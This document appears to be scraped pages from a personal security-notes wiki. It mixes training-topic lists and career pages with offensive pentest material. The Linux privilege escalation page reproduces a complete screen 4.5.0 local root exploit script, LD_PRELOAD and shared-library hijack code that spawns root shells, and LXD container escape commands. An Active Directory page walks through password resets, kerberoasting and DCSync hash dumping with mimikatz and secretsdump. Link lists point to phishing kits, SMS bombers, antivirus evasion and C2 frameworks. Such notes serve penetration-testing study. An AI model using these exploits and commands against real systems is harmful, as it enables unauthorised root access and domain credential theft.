Application Security: Secure coding practices, input validation, output encoding, session management, error handling. * Cloud Security Architecture: Securely designing and deploying applications and services in cloud environments. * Secure IoT Deployment: Implementing security measures for IoT devices, protocols, and communication channels. * Microsegmentation: Implementing fine-grained network segmentation to isolate workloads and limit lateral movement. * Identity and Access Provisioning: Implementing processes and technologies to ensure secure user access provisioning and deprovisioning. * Security Architecture Diagrams: Creating visual representations of security architecture and controls. * Security in Agile Development: Integrating security practices into Agile software development methodologies. * Security in DevOps: Integrating security practices into DevOps workflows and pipelines. * Security in Cloud Environments: Securely designing and configuring cloud environments and services. * Secure Software Development: Secure coding practices, code reviews, and secure development lifecycle (SDLC) methodologies. * Secure Data Storage and Transmission: Encryption, secure protocols, secure file storage, secure data transfer. ### [](https://martian1337.gitbook.io/notes/training-and-career/guides/cybersecurity-training-topics#id-6.-cryptography-and-pki) 6\. Cryptography and PKI * Cryptographic Protocols: SSL/TLS, IPsec, SSH, HTTPS, LDAPS. * Cipher Suites: RC4, AES, DES, 3DES, HMAC, RSA, SHA, understanding different types of attacks on encryption: Cryptographic attacks, Brute-force attacks, Birthday attacks, Rainbow table attacks, Dictionary attacks. * Key Management: Key escrow, key stretching, public key infrastructure. * PKI Components and their roles: CA (Certificate Authority), RA (Registration Authority), Certificate repository, CRL (Certificate Revocation List), OCSP (Online Certificate Status Protocol). * Quantum Cryptography: Understanding quantum key distribution and post-quantum cryptography. * Cryptocurrency: How blockchain and cryptographic principles apply to cryptocurrencies. * Hardware Security Modules (HSM): Devices used to manage digital keys securely. * Digital Signatures: Assuring integrity and non-repudiation of digital communications or files. * Quantum Computing: Impact on encryption and how to prepare for a post-quantum world. * Secure Hashing Algorithms: SHA-1, SHA-2, SHA-3, and their different uses. * Digital Rights Management (DRM): Protecting intellectual property using encryption, licensing, and access control. * Cryptocurrency: Understanding blockchain technology, cryptocurrency wallets, and transaction security. * Secure Socket Layer (SSL) Decryption: Enabling security appliances to inspect encrypted traffic. ### [](https://martian1337.gitbook.io/notes/training-and-career/guides/cybersecurity-training-topics#id-7.-governance-risk-and-compliance) 7\. Governance, Risk, and Compliance * Third-Party Risk Management: Assessing and managing risks associated with vendors, suppliers, and business partners. * Incident Response Plan (IRP): Developing and testing a comprehensive plan to address security incidents effectively. * Security Policies, Standards, and Procedures: Developing and implementing policies aligned with industry best practices and legal requirements. * Security Metrics and KPIs: Defining and tracking key performance indicators to measure the effectiveness of security controls. * Security Training and Awareness Programs: Educating employees on security best practices, policies, and emerging threats. * Compliance Auditing: Internal audits, third-party audits, penetration testing. * Laws and Regulations: Computer Fraud and Abuse Act (CFAA), EU Cybersecurity Act, California Consumer Privacy Act (CCPA). * Ethical Hacking: White hat practices, penetration testing, vulnerability assessments. * Compliance Requirements: Payment Card Industry Data Security Standard (PCI DSS), General Data Protection Regulation (GDPR), Health Insurance Portability and Accountability Act (HIPAA), Sarbanes-Oxley Act (SOX), ISO 27001, NIST 800-53. * Personnel Management: Hiring practices, background checks, employment agreements (NDA, Non-compete), termination processes, continuous education. * Data Privacy and Protection: Personally Identifiable Information (PII), Protected Health Information (PHI), Payment Card Industry Data Security Standard (PCI DSS). * Organizational Risk Management: Risk appetite/tolerance, risk avoidance, transference, acceptance, mitigation, deterrence. * Information Classification: Public, sensitive, private, confidential. * Privacy Impact Assessments (PIA): Assessing the privacy risks and impacts of systems and processes. * Security Awareness Training: Implementing effective training programs for staff. * Code of Ethics: Understanding and adhering to ethical guidelines and professional behavior in the field of cybersecurity. ### [](https://martian1337.gitbook.io/notes/training-and-career/guides/cybersecurity-training-topics#id-8.-operations-and-incident-response) 8\. Operations and Incident Response * Forensics: Collecting, analyzing, and reporting on digital data in a legally admissible manner. * Incident Handling: Preparation, identification, containment, eradication, recovery, and lessons learned. * Business Continuity Planning (BCP): Ensuring critical business functions can continue during and after a disaster. * Cybersecurity Frameworks: Understanding different frameworks like NIST Cybersecurity Framework, MITRE ATT&CK. * Threat Hunting: Proactive identification of threats in the environment. * Purple Teaming: Combination of red teaming (attack simulation) and blue teaming (defense) for comprehensive security. * Threat Intelligence Sharing: Collaborating with industry peers and information sharing communities to exchange threat intelligence. * Incident Response Playbooks: Developing predefined response plans for different types of security incidents. * Digital Forensics Tools and Techniques: Collecting and analyzing digital evidence for incident investigations. * Business Impact Analysis (BIA): Assessing the potential impact of disruptions on critical business processes and systems. * Disaster Recovery Planning (DRP): Developing and testing plans to recover IT infrastructure and systems after a disaster. * Security Incident and Event Management (SIEM) Systems: Collecting and analyzing security event logs for threat detection and incident response. * Incident Response Exercises and Tabletop Drills: Simulating real-world security incidents to test response capabilities. * Incident Response Automation: Implementing tools and processes for automated incident detection, analysis, and response. * Cloud Incident Response: Understanding unique challenges and best practices for incident response in cloud environments. * Malware Analysis: Techniques and tools for analyzing and understanding the behavior of malicious software. * Security Incident Reporting and Documentation: Maintaining accurate records of security incidents for regulatory compliance and legal purposes. [PreviousCybersecurity Roadmaps](https://martian1337.gitbook.io/notes/training-and-career/guides/cybersecurity-roadmaps) [NextAppSec Training Pathway](https://martian1337.gitbook.io/notes/training-and-career/guides/appsec-training-pathway) Last updated 1 year ago * [1\. Threats, Attacks, and Vulnerabilities](https://martian1337.gitbook.io/notes/training-and-career/guides/cybersecurity-training-topics#id-1.-threats-attacks-and-vulnerabilities) * [2\. Identity and Access Management](https://martian1337.gitbook.io/notes/training-and-career/guides/cybersecurity-training-topics#id-2.-identity-and-access-management) * [3\. Technologies and Tools](https://martian1337.gitbook.io/notes/training-and-career/guides/cybersecurity-training-topics#id-3.-technologies-and-tools) * [4\. Risk Management](https://martian1337.gitbook.io/notes/training-and-career/guides/cybersecurity-training-topics#id-4.-risk-management) * [5\. Architecture and Design](https://martian1337.gitbook.io/notes/training-and-career/guides/cybersecurity-training-topics#id-5.-architecture-and-design) * [6\. Cryptography and PKI](https://martian1337.gitbook.io/notes/training-and-career/guides/cybersecurity-training-topics#id-6.-cryptography-and-pki) * [7\. Governance, Risk, and Compliance](https://martian1337.gitbook.io/notes/training-and-career/guides/cybersecurity-training-topics#id-7.-governance-risk-and-compliance) * [8\. Operations and Incident Response](https://martian1337.gitbook.io/notes/training-and-career/guides/cybersecurity-training-topics#id-8.-operations-and-incident-response) --- # Linux Privilege Escalation | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/network-security/linux-privilege-escalation.md) . [](https://martian1337.gitbook.io/notes/notes/network-security/linux-privilege-escalation#kernel-exploits) Kernel Exploits ------------------------------------------------------------------------------------------------------------------------------- #### [](https://martian1337.gitbook.io/notes/notes/network-security/linux-privilege-escalation#enumeration) Enumeration Copy # Check Linux OS Versino uname -a Exploit if the version is vulnerable #### [](https://martian1337.gitbook.io/notes/notes/network-security/linux-privilege-escalation#vulnerable-services-screen) Vulnerable Services (Screen) Copy # Check Version screen -v ### [](https://martian1337.gitbook.io/notes/notes/network-security/linux-privilege-escalation#exploit-script) Exploit Script Copy #!/bin/bash # screenroot.sh # setuid screen v4.5.0 local root exploit # abuses ld.so.preload overwriting to get root. # bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html # HACK THE PLANET # ~ infodox (25/1/2017) echo "~ gnu/screenroot ~" echo "[+] First, we create our shell and library..." cat << EOF > /tmp/libhax.c #include #include #include #include __attribute__ ((__constructor__)) void dropshell(void){ chown("/tmp/rootshell", 0, 0); chmod("/tmp/rootshell", 04755); unlink("/etc/ld.so.preload"); printf("[+] done!\n"); } EOF gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c rm -f /tmp/libhax.c cat << EOF > /tmp/rootshell.c #include int main(void){ setuid(0); setgid(0); seteuid(0); setegid(0); execvp("/bin/sh", NULL, NULL); } EOF gcc -o /tmp/rootshell /tmp/rootshell.c -Wno-implicit-function-declaration rm -f /tmp/rootshell.c echo "[+] Now we create our /etc/ld.so.preload file..." cd /etc umask 000 # because screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed echo "[+] Triggering..." screen -ls # screen itself is setuid, so... /tmp/rootshell [](https://martian1337.gitbook.io/notes/notes/network-security/linux-privilege-escalation#cron-job-abuse) Cron Job Abuse ----------------------------------------------------------------------------------------------------------------------------- ### [](https://martian1337.gitbook.io/notes/notes/network-security/linux-privilege-escalation#enumeration-1) Enumeration https://github.com/DominicBreuker/pspy ### [](https://martian1337.gitbook.io/notes/notes/network-security/linux-privilege-escalation#exploitation) Exploitation [](https://martian1337.gitbook.io/notes/notes/network-security/linux-privilege-escalation#special-permissions) Special Permissions --------------------------------------------------------------------------------------------------------------------------------------- ### [](https://martian1337.gitbook.io/notes/notes/network-security/linux-privilege-escalation#setuid-bit) Setuid Bit [](https://martian1337.gitbook.io/notes/notes/network-security/linux-privilege-escalation#path-abuse) Path Abuse --------------------------------------------------------------------------------------------------------------------- PATH is an environment variable that specifies the set of directories where an executable can be located. [](https://martian1337.gitbook.io/notes/notes/network-security/linux-privilege-escalation#credentials-hunting) Credentials Hunting --------------------------------------------------------------------------------------------------------------------------------------- [](https://martian1337.gitbook.io/notes/notes/network-security/linux-privilege-escalation#shared-libraries) Shared Libraries --------------------------------------------------------------------------------------------------------------------------------- [](https://martian1337.gitbook.io/notes/notes/network-security/linux-privilege-escalation#shared-object-hijacking) Shared Object Hijacking ----------------------------------------------------------------------------------------------------------------------------------------------- [](https://martian1337.gitbook.io/notes/notes/network-security/linux-privilege-escalation#privileged-groups) Privileged Groups ----------------------------------------------------------------------------------------------------------------------------------- [PreviousPivoting, Tunneling and Forwarding](https://martian1337.gitbook.io/notes/notes/network-security/pivoting-tunneling-and-forwarding) [NextWindows Privesc](https://martian1337.gitbook.io/notes/notes/network-security/windows-privesc) Last updated 1 year ago * [Kernel Exploits](https://martian1337.gitbook.io/notes/notes/network-security/linux-privilege-escalation#kernel-exploits) * [Exploit Script](https://martian1337.gitbook.io/notes/notes/network-security/linux-privilege-escalation#exploit-script) * [Cron Job Abuse](https://martian1337.gitbook.io/notes/notes/network-security/linux-privilege-escalation#cron-job-abuse) * [Enumeration](https://martian1337.gitbook.io/notes/notes/network-security/linux-privilege-escalation#enumeration-1) * [Exploitation](https://martian1337.gitbook.io/notes/notes/network-security/linux-privilege-escalation#exploitation) * [Special Permissions](https://martian1337.gitbook.io/notes/notes/network-security/linux-privilege-escalation#special-permissions) * [Setuid Bit](https://martian1337.gitbook.io/notes/notes/network-security/linux-privilege-escalation#setuid-bit) * [Path Abuse](https://martian1337.gitbook.io/notes/notes/network-security/linux-privilege-escalation#path-abuse) * [Credentials Hunting](https://martian1337.gitbook.io/notes/notes/network-security/linux-privilege-escalation#credentials-hunting) * [Shared Libraries](https://martian1337.gitbook.io/notes/notes/network-security/linux-privilege-escalation#shared-libraries) * [Shared Object Hijacking](https://martian1337.gitbook.io/notes/notes/network-security/linux-privilege-escalation#shared-object-hijacking) * [Privileged Groups](https://martian1337.gitbook.io/notes/notes/network-security/linux-privilege-escalation#privileged-groups) Copy # Find Write Able Files find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null Copy # Add chmod u+s /bin/bash Copy # Find Setuid find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null # Find Setgid find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null Copy # Add Current Directory to Path PATH=.:${PATH} export PATH # Verify Path echo $PATH Copy # Enumerate Spool / Mail Directory for Creds find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null # SSH Keys ls ~/.ssh Copy # Check Shared Libaries ldd /bin/ls # Abuse LD_PRELOAD #include #include #include void _init() { unsetenv("LD_PRELOAD"); setgid(0); setuid(0); system("/bin/bash"); } # Compile gcc -fPIC -shared -o root.so root.c -nostartfiles # Run Sudo sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart Copy # Check Shared Libraries ldd # Check Load Location readelf -d | grep PATH # Malicous Library #include #include void dbquery() { printf("Malicious library loaded\n"); setuid(0); system("/bin/sh -p"); } # Compile gcc root.c -fPIC -shared -o /development/libshared.so Copy # Check Group id # if LXD is inside the group # Import Image lxc image import alpine.tar.gz alpine.tar.gz.root --alias alpine # Start Privileged Container lxc init alpine r00t -c security.privileged=true # Mount Host lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true # Start Container lxc start r00t # Get Shell lxc exec r00t /bin/sh --- # Social Engineering | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/resources/offensive-cybersecurity/social-engineering.md) . [Beast Bomber](https://gitlab.com/ebankoff/Beast_Bomber) [PyPhisher](https://github.com/KasRoudra/PyPhisher) [Awesome Social Engineering](https://github.com/v2-dev/awesome-social-engineering) **SMS Services** Send SMS - TX only [Txtdrop](http://www.txtdrop.com/) [Textem](https://freebulksmsonline.com/https://www.afreesms.com/https://smsend.ru/https://txtemnow.com/http://www.sendanonymoussms.com/http://www.textem.net/http://www.txtdrop.com/) [Txtemnow](https://freebulksmsonline.com/https://www.afreesms.com/https://smsend.ru/https://txtemnow.com/http://www.sendanonymoussms.com/http://www.textem.net/http://www.txtdrop.com/) [SendanonymousSMS](https://freebulksmsonline.com/https://www.afreesms.com/https://smsend.ru/https://txtemnow.com/http://www.sendanonymoussms.com/http://www.textem.net/http://www.txtdrop.com/) [SMSend](https://freebulksmsonline.com/https://www.afreesms.com/https://smsend.ru/https://txtemnow.com/http://www.sendanonymoussms.com/http://www.textem.net/http://www.txtdrop.com/) [AfreeSMS](https://www.afreesms.com/) [FreebulkSMSonline](https://freebulksmsonline.com/) **Send and Receive SMS** \----------------------------- \----------------------------- [SMS-online](https://sms-online.co/) [SMS.SELLAITE](http://sms.sellaite.com/) [Send SMS now](https://www.sendsmsnow.com/) [Receive SMS online](https://www.receivesmsonline.net/) [Free SMS code](https://freesmscode.com/) [HS3X](http://hs3x.com/) [SMS Get](https://smsget.net/) [GetfreeSMSnumber](https://getfreesmsnumber.com/) [ReceivefreeSMS](http://receivefreesms.com/) [ReceivefreeSMS](http://receivefreesms.com/) [7sim](https://7sim.org/) [1S2U](https://1s2u.com/) [Text anywhere](http://www.textanywhere.net/) [Proovl](https://www.proovl.com/numbers) [Groovl](https://www.groovl.com/) [PreviousWordlists](https://martian1337.gitbook.io/notes/resources/offensive-cybersecurity/wordlists) [NextMobile Pentesting](https://martian1337.gitbook.io/notes/resources/offensive-cybersecurity/mobile-pentesting) Last updated 1 year ago --- # Infrastructure Pentesting | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/resources/offensive-cybersecurity/infrastructure-pentesting.md) . * [Windows & AD Exploitation Cheatsheet](https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference/) by chvancooten * [Wadoms Interactive AD Pentest CheatSheet](https://wadcoms.github.io/) ! * [Ciphey](https://github.com/Ciphey/Ciphey) - Encryption Exploitation Network Shells **General Tools** [GTFOBins](https://github.com/GTFOBins/GTFOBins.github.io) [Windows Exploitatation from @FULLSHADE](https://github.com/FULLSHADE/WindowsExploitationResources) [EvilWinRM](https://github.com/Hackplayers/evil-winrm) [HoaxShell](https://github.com/t3l3machus/hoaxshell) ! [Shennina](https://github.com/mazen160/shennina) - automated host exploitation framework **Antivirus and EDR Evasion** [AMSI Bypass Powershell](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell) [ProtectMyTooling](https://github.com/mgeeky/ProtectMyTooling) - Packer [Garble](https://github.com/burrowers/garble) - Golang packer [PatchThatAMSI](https://github.com/D1rkMtr/PatchThatAMSI) [Unprotect](https://unprotect.it/) \- Evasion Techniques database [Wireshark: Network protocol analysis tool](https://www.wireshark.org/#download) [NMap: The pre-eminent network mapping tool](https://nmap.org/download) [JFScan](https://github.com/nullt3r/jfscan) [CrackMapExec A swiss army knife for pentesting networks](https://github.com/Porchetta-Industries/CrackMapExec) [Legion](https://github.com/GoVanguard/legion) [VLANPWN](https://github.com/in9uz/VLANPWN) [Responder](https://github.com/lgandx/Responder) ! [OrbitalDump](https://github.com/k4yt3x/orbitaldump) (SSH Brute-forcer) [Reverse Shell Generator](https://www.revshells.com/) [PHP Reverse Shell](https://github.com/pentestmonkey/php-reverse-shell) [Reverse Shell Cheat Sheet](https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) by pentestmonkey [PayloadsAllTheThings RevShell cheatsheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md) Post-Exploitation Malware C2 Tools [Forensia](https://github.com/PaulNorman01/Forensia) - Anti Forensics Tool [GTFONow](https://github.com/Frissi0n/GTFONow) - Privesc automation tool [Awesome Malware Development Repo](https://github.com/rootkit-io/awesome-malware-development) [Maldev for Dummies](https://github.com/chvancooten/maldev-for-dummies) [Sektor7 Institute](https://institute.sektor7.net/) - Malware Dev training C2s [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec/) [DBC2](https://github.com/Arno0x/DBC2/) [Empire](https://github.com/EmpireProject/Empire/) [EvilOSX](https://github.com/Marten4n6/EvilOSX/) [PEASS from @carlospolop](https://github.com/carlospolop/PEASS-ng) ! [Portia](https://github.com/milo2012/portia) [ProcessHider](https://github.com/M00nRise/ProcessHider/) [PwnCat](https://github.com/calebstewart/pwncat) [pupy](https://github.com/n1nj4sec/pupy) [Villian - Backdoor generator by @t3l3machus](https://github.com/t3l3machus/Villain) [DefenderCheck](https://github.com/matterpreter/DefenderCheck) - tool to check/modify signatures used by antivirus for detection [LOLBAS](https://lolbas-project.github.io/) [Havoc](https://github.com/HavocFramework/Havoc) [Silver](https://github.com/BishopFox/sliver/wiki/HTTP(S)-C2) [Merlin](https://github.com/Ne0nd0g/merlin) [GithubC2](https://github.com/D1rkMtr/githubC2) [VirusTotalC2](https://github.com/D1rkMtr/VirusTotalC2) [Reddit C2](https://github.com/kleiton0x00/RedditC2) [Low detection c2](https://github.com/polymaster3313/PolyMalware) by @polymaster3313 [C2 Matrix](https://docs.google.com/spreadsheets/d/1b4mUxa6cDQuTV2BPC6aA-GR4zGZi0ooPYtBe4IgPsSc/edit#gid=0) ! [PreviousGeneral](https://martian1337.gitbook.io/notes/resources/offensive-cybersecurity/general) [NextCloud Pentesting](https://martian1337.gitbook.io/notes/resources/offensive-cybersecurity/cloud-pentesting) Last updated 6 months ago --- # Cybersecurity Domains | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/training-and-career/cybersecurity-domains.md) . ### [](https://martian1337.gitbook.io/notes/training-and-career/cybersecurity-domains#governance-risk-and-compliance) Governance, Risk & Compliance * ISO 27001 / HIPPA / PCI SOC * Firewall Compliance * Physical & Logical Reviews * Configuration Compliance * Audit & Compliance Analysis ### [](https://martian1337.gitbook.io/notes/training-and-career/cybersecurity-domains#mobile-security) Mobile Security * Authentication & Onboarding * Rogue Access Point Detection * Wireless Security Protocols * OWASP Mobile Top 10 * Automated Mobile App Scanning * Dynamic Mobile App Analysis * Secure Coding Practices * Mobile Pen Testing * Secure Code Review ### [](https://martian1337.gitbook.io/notes/training-and-career/cybersecurity-domains#application-security) Application Security * Secure Code Review * Application Pen Testing * Vulnerability Validation * Secure Coding Practices * Web App Firewall * Web App Security * OWASP Top 10 / SANS CWE Top 25 * Database Activity Monitoring * Content Security * Secure File Transfer ### [](https://martian1337.gitbook.io/notes/training-and-career/cybersecurity-domains#network-security) Network Security * Firewall Management * Network Access Control * Secure Network Design * Unified Threat Management * Remote Access * IDS/IPS * Pen Testing ### [](https://martian1337.gitbook.io/notes/training-and-career/cybersecurity-domains#data-security) Data Security * Data Encryption * Data Leakage Prevention ### [](https://martian1337.gitbook.io/notes/training-and-career/cybersecurity-domains#infrastructure-security) Infrastructure Security * DNS Security * Mail Security * Unified Communications * SIEM (Security Info & Event Mgmt) * Log / False Positive Analysis * Zero-Day Vulnerability Tracking ### [](https://martian1337.gitbook.io/notes/training-and-career/cybersecurity-domains#advance-threat-protection) Advance Threat Protection * Botnet Protection * Malware Analysis & Anti-Malware * Sandboxing / Emulation * Application Whitelisting * Network Forensics * Automated Security Analytics ### [](https://martian1337.gitbook.io/notes/training-and-career/cybersecurity-domains#system-security) System Security * Windows/Linux Server Security * Vulnerability & Patch Management * Automated Vulnerability Scanning [PreviousKeeping it Real for Beginners](https://martian1337.gitbook.io/notes/training-and-career/keeping-it-real-for-beginners) [NextReading and Repos](https://martian1337.gitbook.io/notes/training-and-career/reading-and-repos) Last updated 10 months ago * [Governance, Risk & Compliance](https://martian1337.gitbook.io/notes/training-and-career/cybersecurity-domains#governance-risk-and-compliance) * [Mobile Security](https://martian1337.gitbook.io/notes/training-and-career/cybersecurity-domains#mobile-security) * [Application Security](https://martian1337.gitbook.io/notes/training-and-career/cybersecurity-domains#application-security) * [Network Security](https://martian1337.gitbook.io/notes/training-and-career/cybersecurity-domains#network-security) * [Data Security](https://martian1337.gitbook.io/notes/training-and-career/cybersecurity-domains#data-security) * [Infrastructure Security](https://martian1337.gitbook.io/notes/training-and-career/cybersecurity-domains#infrastructure-security) * [Advance Threat Protection](https://martian1337.gitbook.io/notes/training-and-career/cybersecurity-domains#advance-threat-protection) * [System Security](https://martian1337.gitbook.io/notes/training-and-career/cybersecurity-domains#system-security) --- # Guides | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/training-and-career/guides.md) . [Cybersecurity Roadmaps](https://martian1337.gitbook.io/notes/training-and-career/guides/cybersecurity-roadmaps) [Cybersecurity Training Topics](https://martian1337.gitbook.io/notes/training-and-career/guides/cybersecurity-training-topics) [AppSec Training Pathway](https://martian1337.gitbook.io/notes/training-and-career/guides/appsec-training-pathway) [Resume and Interview Guide](https://martian1337.gitbook.io/notes/training-and-career/guides/interview-checklist) [Exploit & Malware Development](https://martian1337.gitbook.io/notes/training-and-career/guides/exploit-and-malware-development) [PreviousMedia](https://martian1337.gitbook.io/notes/training-and-career/media) [NextCybersecurity Roadmaps](https://martian1337.gitbook.io/notes/training-and-career/guides/cybersecurity-roadmaps) Last updated 1 year ago --- # Access Control Lists and Entries (ACL & ACE) | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/network-security/access-control-lists-and-entries-acl-and-ace.md) . [](https://martian1337.gitbook.io/notes/notes/network-security/access-control-lists-and-entries-acl-and-ace#acl-enumeration) ACL Enumeration ------------------------------------------------------------------------------------------------------------------------------------------------- #### [](https://martian1337.gitbook.io/notes/notes/network-security/access-control-lists-and-entries-acl-and-ace#find-interesting-acl) Find Interesting ACL Copy # Find ACL Find-IntrestingDomainAcl # More Effectively, filter by user(s) we have control $sid = Convert-NameToSid Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid} # Reverse GUID (ObjectAceType) $guid= Get-ADObject -SearchBase "CN=Extended-Rights,$((Get-ADRootDSE).ConfigurationNamingContext)" -Filter {ObjectClass -like 'ControlAccessRight'} -Properties * |Select Name,DisplayName,DistinguishedName,rightsGuid| ?{$_.rightsGuid -eq $guid} | fl # Powerview All in 1 Command Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid} #### [](https://martian1337.gitbook.io/notes/notes/network-security/access-control-lists-and-entries-acl-and-ace#show-all-rights-that-user-has) Show All Rights That User Has Copy # Create Variable $user-priv = Convert-NameToSid damundsen # Show Rights Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $user-priv2} -Verbose | select AceType, ObjectDN, ActiveDirectoryRights #### [](https://martian1337.gitbook.io/notes/notes/network-security/access-control-lists-and-entries-acl-and-ace#enumerate-nested-group) Enumerate Nested Group [](https://martian1337.gitbook.io/notes/notes/network-security/access-control-lists-and-entries-acl-and-ace#abusing-acl) Abusing ACL ----------------------------------------------------------------------------------------------------------------------------------------- #### [](https://martian1337.gitbook.io/notes/notes/network-security/access-control-lists-and-entries-acl-and-ace#change-password) Change Password ### [](https://martian1337.gitbook.io/notes/notes/network-security/access-control-lists-and-entries-acl-and-ace#create-fake-spn-genericwrite) Create Fake SPN - GenericWrite ### [](https://martian1337.gitbook.io/notes/notes/network-security/access-control-lists-and-entries-acl-and-ace#cleaning-up) Cleaning Up [](https://martian1337.gitbook.io/notes/notes/network-security/access-control-lists-and-entries-acl-and-ace#dcsync) DCSync ------------------------------------------------------------------------------------------------------------------------------- ### [](https://martian1337.gitbook.io/notes/notes/network-security/access-control-lists-and-entries-acl-and-ace#manual) Manual #### [](https://martian1337.gitbook.io/notes/notes/network-security/access-control-lists-and-entries-acl-and-ace#enumeration-steps) Enumeration Steps #### [](https://martian1337.gitbook.io/notes/notes/network-security/access-control-lists-and-entries-acl-and-ace#exploitation-steps) Exploitation Steps ### [](https://martian1337.gitbook.io/notes/notes/network-security/access-control-lists-and-entries-acl-and-ace#mimikatz) Mimikatz [PreviousPost-Exploitation](https://martian1337.gitbook.io/notes/notes/network-security/privileged-access) [NextCredentialed Enumeration](https://martian1337.gitbook.io/notes/notes/network-security/credentialed-enumeration) Last updated 1 year ago * [ACL Enumeration](https://martian1337.gitbook.io/notes/notes/network-security/access-control-lists-and-entries-acl-and-ace#acl-enumeration) * [Abusing ACL](https://martian1337.gitbook.io/notes/notes/network-security/access-control-lists-and-entries-acl-and-ace#abusing-acl) * [Create Fake SPN - GenericWrite](https://martian1337.gitbook.io/notes/notes/network-security/access-control-lists-and-entries-acl-and-ace#create-fake-spn-genericwrite) * [Cleaning Up](https://martian1337.gitbook.io/notes/notes/network-security/access-control-lists-and-entries-acl-and-ace#cleaning-up) * [DCSync](https://martian1337.gitbook.io/notes/notes/network-security/access-control-lists-and-entries-acl-and-ace#dcsync) * [Manual](https://martian1337.gitbook.io/notes/notes/network-security/access-control-lists-and-entries-acl-and-ace#manual) * [Mimikatz](https://martian1337.gitbook.io/notes/notes/network-security/access-control-lists-and-entries-acl-and-ace#mimikatz) Copy # Check Nested Group of HelpDesk Get-DomainGroup -Identity "Help Desk Level 1" | select memberof # Check Discovered Nested Group $itgroupsid = Convert-NameToSid "Information Technology" Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $itgroupsid} -Verbose | select AceType, ObjectDN, ActiveDirectoryRight # Discoveed Object DN Enumeration $adunnsid = Convert-NameToSid adunn Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $adunnsid} -Verbose Copy # PowerShell Console As Desired User $SecPassword = ConvertTo-SecureString 'transporter@4' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword) # Creating Password for Target User $Password = ConvertTo-SecureString '0xF0rk123!' -AsPlainText -Force # Create Password Set-DomainUserPassword -Identity damundsen -AccountPassword $Password -Credential $Cred -Verbose $Cred2 = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\damundsen', $SecPassword) # Add User to Group Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members 'damundsen' -Credential $Cred2 -Verbose # Verify User is Added Get-DomainGroupMember -Identity "Help Desk Level 1" | Select MemberName Copy # Create SPN Set-DomainObject -Credential $Cred2 -Identity adunn -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose # Get User Hash .\Rubeus.exe kerberoast /user:adunn /nowrap Copy # Remove SPN Set-DomainObject -Credential $Cred2 -Identity adunn -Clear serviceprincipalname -Verbose # Remove User From Group Remove-DomainGroupMember -Identity "Help Desk Level 1" -Members 'damundsen' -Credential $Cred2 -Verbose Copy # List Group Membership Get-DomainUser -Identity adunn |select samaccountname,objectsid,memberof # Review ObjectSID $sid= "" # Verify DC-Sync Rights Get-ObjectAcl "DC=inlanefreight,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get')} | ?{$_.SecurityIdentifier -match $sid} |select AceQualifier, ObjectDN, ActiveDirectoryRights,SecurityIdentifier,ObjectAceType | fl Copy secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/adunn@172.16.5.5 Copy # Mimikatz DCSync lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator --- # Domain 8: Secure Software Supply Chain | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/certifications/csslp/domain-8-secure-software-supply-chain.md) . [](https://martian1337.gitbook.io/notes/notes/certifications/csslp/domain-8-secure-software-supply-chain#supply-chain-risk-management) Supply Chain Risk Management ------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Supply chain risk management is designed to bring the risk posed to an organization by its supply chain to within manageable levels. The four main steps of supply chain risk management are: * **Identify:** All products and items that pose a potential risk to the organization are identified * **Assess:** Each product is assessed for the potential risks that it might pose * **Respond:** The organization develops a strategy for managing each identified risk, including vulnerability patching, agreements with suppliers, etc. * **Monitor:** Ongoing monitoring ensures that mitigations are effectively managing the risk\\ Third-party software may operate under various licensing models, including: * **Copyright:** A copyright protects the intellectual property of the author, restricting how it can be used * **Permissive:** Permissive licenses (MIT, BSD, etc.) impose minimal requirements on how software can be used or redistributed * **Copyleft:** Copyleft licenses (GPL, etc.) require that software using the original source code provides the same rights to the user Permissive licenses have the least impact because they don't create legal issues or force the organization to use a particular 